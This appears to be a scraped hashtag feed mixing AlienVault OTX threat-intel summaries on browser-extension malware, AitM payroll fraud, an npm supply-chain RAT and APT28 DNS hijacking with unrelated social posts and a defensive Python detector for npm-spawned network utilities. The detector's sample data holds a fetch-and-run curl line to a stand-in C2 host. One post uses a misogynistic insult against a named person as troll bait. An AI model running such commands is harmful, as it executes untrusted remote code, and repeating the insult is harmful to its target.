108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure

A coordinated campaign of 108 malicious Chrome extensions operated through shared command-and-control infrastructure at cloudapi[.]stream has been identified, collectively accounting for approximately 20,000 installations. The campaign spans multiple threat categories: 54 extensions steal Google account identities via OAuth2, one extension actively exfiltrates Telegram Web sessions every 15 seconds, and 45 extensions contain a universal backdoor enabling arbitrary URL execution on browser startup. Published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), these extensions masquerade as legitimate tools including Telegram sidebar clients, slot games, YouTube and TikTok enhancers, and translation utilities. All extensions route stolen credentials, user identities, and browsing data to servers controlled by the same operator, with infrastructure confirming a Malware-as-a-Service business model.

Pulse ID: 69de5f631a2f4bca81392ccd
Pulse Link: https://otx.alienvault.com/pulse/69de5f631a2f4bca81392ccd
Pulse Author: AlienVault
Created: 2026-04-14 15:38:11

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Chrome #ChromeExtension #Cloud #CyberSecurity #Google #InfoSec #Malware #MalwareAsAService #OTX #OpenThreatExchange #RAT #Telegram #Troll #YouTube #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
New Lego video 4/9/26 #duet #iran #lego #legovideo #distrack #diss #legos #epstein #trump #troll

YouTube
#MissKitty #troll technique. If you have any doubts about whether the person who seemed okay but who is a little weird right now is a troll, just dropped that #Melania is an #international #whore. If troll, provokes a response. Booyah. Click. Blocked. Ta da. 😹😹😹
Ready to salute the memory of the Neo-Nazis within the French National Assembly, delivered from Nazism? Come on, come and confront me @[email protected] little #troll #propagande #propagandiste proto-fascist. By proto-fascist I mean:

Payroll pirate attacks targeting Canadian employees

Microsoft Incident Response researchers identified Storm-2755, a financially motivated threat actor conducting payroll pirate attacks against Canadian users. The campaign uses malvertising and SEO poisoning on generic search terms like "Office 365" to lure victims to a fraudulent sign-in page. Through adversary-in-the-middle techniques, the actor captures authentication tokens and session cookies, bypassing MFA protections. Storm-2755 maintains persistence using the Axios HTTP client to replay stolen tokens, then conducts discovery for payroll and HR contacts. The actor impersonates compromised users to socially engineer HR staff or directly manipulates payroll systems like Workday. Malicious inbox rules hide correspondence from victims. Attacks resulted in direct financial losses through redirected salary payments to attacker-controlled bank accounts.

Pulse ID: 69d80c2c976a9ec209e19217
Pulse Link: https://otx.alienvault.com/pulse/69d80c2c976a9ec209e19217
Pulse Author: AlienVault
Created: 2026-04-09 20:29:32

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AdversaryInTheMiddle #Bank #Canadian #Cookies #CyberSecurity #HTTP #InfoSec #MFA #Malvertising #Microsoft #OTX #Office #OpenThreatExchange #RAT #SEOPoisoning #Troll #bot #iOS #AlienVault


NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain attack targeting the Axios npm package has been identified after threat actors compromised the npm account of the company's lead developer. Malicious versions ([email protected] and [email protected]) were published containing a hidden dependency that executed postinstall scripts during npm installation. This automated execution downloaded and deployed a remote access trojan on affected systems without requiring user interaction, making it particularly dangerous for developer environments and CI/CD pipelines. The compromise resulted in full remote access capabilities, potential credential exposure including API keys and SSH keys, and possible insertion of malicious code into software builds. Detection platforms identified suspicious process execution chains involving npm spawning command interpreters and network utilities, followed by outbound connections to attacker-controlled infrastructure.

Pulse ID: 69d8b0c258b4fef5541358bb
Pulse Link: https://otx.alienvault.com/pulse/69d8b0c258b4fef5541358bb
Pulse Author: AlienVault
Created: 2026-04-10 08:11:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NPM #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SSH #SupplyChain #Trojan #Troll #bot #iOS #AlienVault
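The pulse above notes that detection platforms flagged npm spawning a command interpreter which in turn spawned a network utility. The following is an added example, not code from the pulse, from AlienVault, or from the Axios project: a small detector that walks constructed process-tree telemetry (pid, parent pid, image name, command line) and reports exactly that chain. The event records, process names and the `c2.example.invalid` host are all constructed for illustration; a real deployment would feed it EDR or auditd process-creation events instead.

```python
"""Flag npm -> shell -> network-utility process chains.

Added example (not from the OTX pulse). The telemetry below is constructed
to resemble endpoint process-creation events; field names are assumptions.
"""
from dataclasses import dataclass

# Names are matched case-insensitively so Windows and Unix images both work.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}
NET_UTILS = {"curl", "wget", "nc", "ncat", "certutil.exe", "bitsadmin.exe"}
NPM_IMAGES = {"npm", "npm.cmd", "npx"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    name: str      # image / process name
    cmdline: str   # full command line


# Constructed sample telemetry: a benign build step, an install whose
# lifecycle script pulls a payload over the network, and an unrelated
# curl run from a user shell that must NOT be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "npm", "npm install"),
    ProcEvent(101, 100, "sh", "sh -c node scripts/build.js"),
    ProcEvent(102, 101, "node", "node scripts/build.js"),
    ProcEvent(200, 1, "npm", "npm install"),
    ProcEvent(201, 200, "sh", "sh -c curl -s http://c2.example.invalid/p | sh"),
    ProcEvent(202, 201, "curl", "curl -s http://c2.example.invalid/p"),
    ProcEvent(203, 201, "sh", "sh"),
    ProcEvent(300, 1, "bash", "bash"),
    ProcEvent(301, 300, "curl", "curl https://registry.npmjs.org/"),
]


def _is_npm(ev: ProcEvent) -> bool:
    """npm may show up as its own image or as node running the npm CLI."""
    first = ev.cmdline.split()[:1]
    return ev.name.lower() in NPM_IMAGES or (first and first[0].lower() in NPM_IMAGES)


def _ancestors(ev: ProcEvent, by_pid: dict, max_depth: int = 6) -> list:
    """Return the parent chain of ev, nearest first, bounded to avoid cycles."""
    chain = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        if cur.ppid == cur.pid:
            break
        cur = by_pid.get(cur.ppid)
    return chain


def find_npm_to_network_chains(events) -> list:
    """Return (npm_pid, net_pid, net_cmdline) for every network utility whose
    ancestry contains a command interpreter with an npm process above it."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.name.lower() not in NET_UTILS:
            continue
        seen_interp = False
        for anc in _ancestors(ev, by_pid):
            if anc.name.lower() in INTERPRETERS:
                seen_interp = True
            elif seen_interp and _is_npm(anc):
                hits.append((anc.pid, ev.pid, ev.cmdline))
                break
    return hits


if __name__ == "__main__":
    for npm_pid, net_pid, cmd in find_npm_to_network_chains(SAMPLE_EVENTS):
        print(f"suspicious chain: npm pid {npm_pid} -> network pid {net_pid}: {cmd}")
```

The walk requires an interpreter between npm and the network utility because that is how lifecycle scripts run (`sh -c` on Unix, `cmd.exe /c` on Windows); a direct npm-to-curl parent link without the interpreter would be worth a lower-severity rule of its own. Treat a hit as a trigger to inspect the package's `scripts` block and the install logs, not as proof of compromise, since some legitimate packages do fetch prebuilt binaries during install.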


Luckily I am not God, and when in doubt I keep quiet: 7 rules for not being a #troll, not even by accident.

Communicating in a civil way does not just mean being "polite"; it means creating a space in which ideas can circulate without hurting people.

Here is a mini-decalogue (actually 7 rules) that I try to follow so as not to be aggressive

#vibes #lifestyle

https://taccuinodegliappunti.wordpress.com/2026/04/10/regole-comunicazione-non-aggressiva/?utm_source=mastodon&utm_medium=jetpack_social


What visual novel most resembles Disco Elysium?

#gameingTheory #troll #butReallyTho

APT28 exploit routers to enable DNS hijacking operations

Russian cyber actors APT28 have been exploiting routers to overwrite Dynamic Host Configuration Protocol (DHCP)/Domain Name System (DNS) settings to redirect traffic through attacker-controlled DNS servers. The resulting malicious DNS resolutions enable adversary-in-the-middle (AitM) attacks that harvest passwords, OAuth tokens and other credentials for web- and email-related services. This puts organisations at risk of credential theft, data manipulation and broader compromise.

Pulse ID: 69d50d4138f1353a9d14ce48
Pulse Link: https://otx.alienvault.com/pulse/69d50d4138f1353a9d14ce48
Pulse Author: AlienVault
Created: 2026-04-07 13:57:21

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APT28 #AdversaryInTheMiddle #AitM #CyberSecurity #DNS #Email #InfoSec #OTX #OpenThreatExchange #Password #Passwords #RAT #Russia #Troll #Word #bot #AlienVault
